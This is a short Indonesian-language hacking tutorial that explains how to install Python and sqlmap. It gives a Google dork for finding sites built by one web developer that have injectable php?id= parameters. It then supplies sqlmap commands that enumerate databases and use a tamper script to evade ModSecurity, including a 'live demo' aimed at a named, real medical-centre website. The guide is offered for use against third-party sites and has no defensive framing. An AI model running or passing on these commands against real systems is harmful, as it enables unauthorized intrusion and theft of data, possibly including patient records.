install python untuk windows bisa didwonload di:
https://www.python.org/downloads/
dan untuk linux langsung dwonload tool sqlmap
dan download tool sqlmap
di:https://github.com/sqlmapproject/sqlmap
setelah diinstall python dan didwonload sqlmap
jalankan perintah dengan CMD usahakan sqlmap ditempatkan difolder :C untuk lebih mudah ditemukan
perintahnya buka cmd ketik perintah:
cd/
cd sqlmap <--- untuk masuk folder sqlmap
python sqlmap.py --help
# Dork :intext:"Web India Solutions" & inurl:"php?id="
intext:"Website Development Web India Solutions" +inurl:.php?id=
dan exploitnnya:
sqlmap -u http://www.site.com/filevuln.php?id=(ID)--dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast
Demo live:
sqlmap -u http://www.shmedicalcentrektm.com/departments.php?id=34 --dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast
smoga bermanfaat n credit to "https://github.com"